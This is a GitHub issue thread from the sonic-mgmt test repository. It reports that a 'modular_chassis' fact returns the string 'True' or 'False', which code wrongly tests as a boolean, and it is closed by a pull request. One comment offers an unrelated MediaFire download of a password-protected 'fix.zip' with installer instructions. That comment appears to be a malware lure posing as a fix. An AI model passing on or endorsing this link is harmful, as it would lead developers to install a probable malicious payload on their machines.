### ISSUE TITLE
[Bug]: Wrong usage of duthost.get_facts().get("modular_chassis")

### ISSUE THREAD

**Issue by cyw233** [sonic-net/sonic-mgmt#14249]
### Issue Description

I found we are treating the type of the return value of `duthost.get_facts().get("modular_chassis")` as Boolean in multiple places in this repo, for example, we simpy do `if duthost.get_facts().get("modular_chassis")` [here](https://github.com/sonic-net/sonic-mgmt/blob/master/tests/platform_tests/test_power_off_reboot.py#L91-L92) to check if the current device is a chassis.  However, `duthost.get_facts().get("modular_chassis")` will actually return a value of type
`ansible.utils.unsafe_proxy.AnsibleUnsafeText` ("True" or "False"). We should fix all the exiting wrong usages to prevent any potential issues. 

### Results you see

Using `if duthost.get_facts().get("modular_chassis")` will be `True` even if `duthost.get_facts().get("modular_chassis")` returns `"False"` of type `AnsibleUnsafeText`

### Results you expected to see

Use something like `if duthost.get_facts().get("modular_chassis").lower() == "true"` rather than `if duthost.get_facts().get("modular_chassis")`

### Is it platform specific

generic

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yejianquan** [comment]
Closed by https://github.com/sonic-net/sonic-mgmt/pull/14318
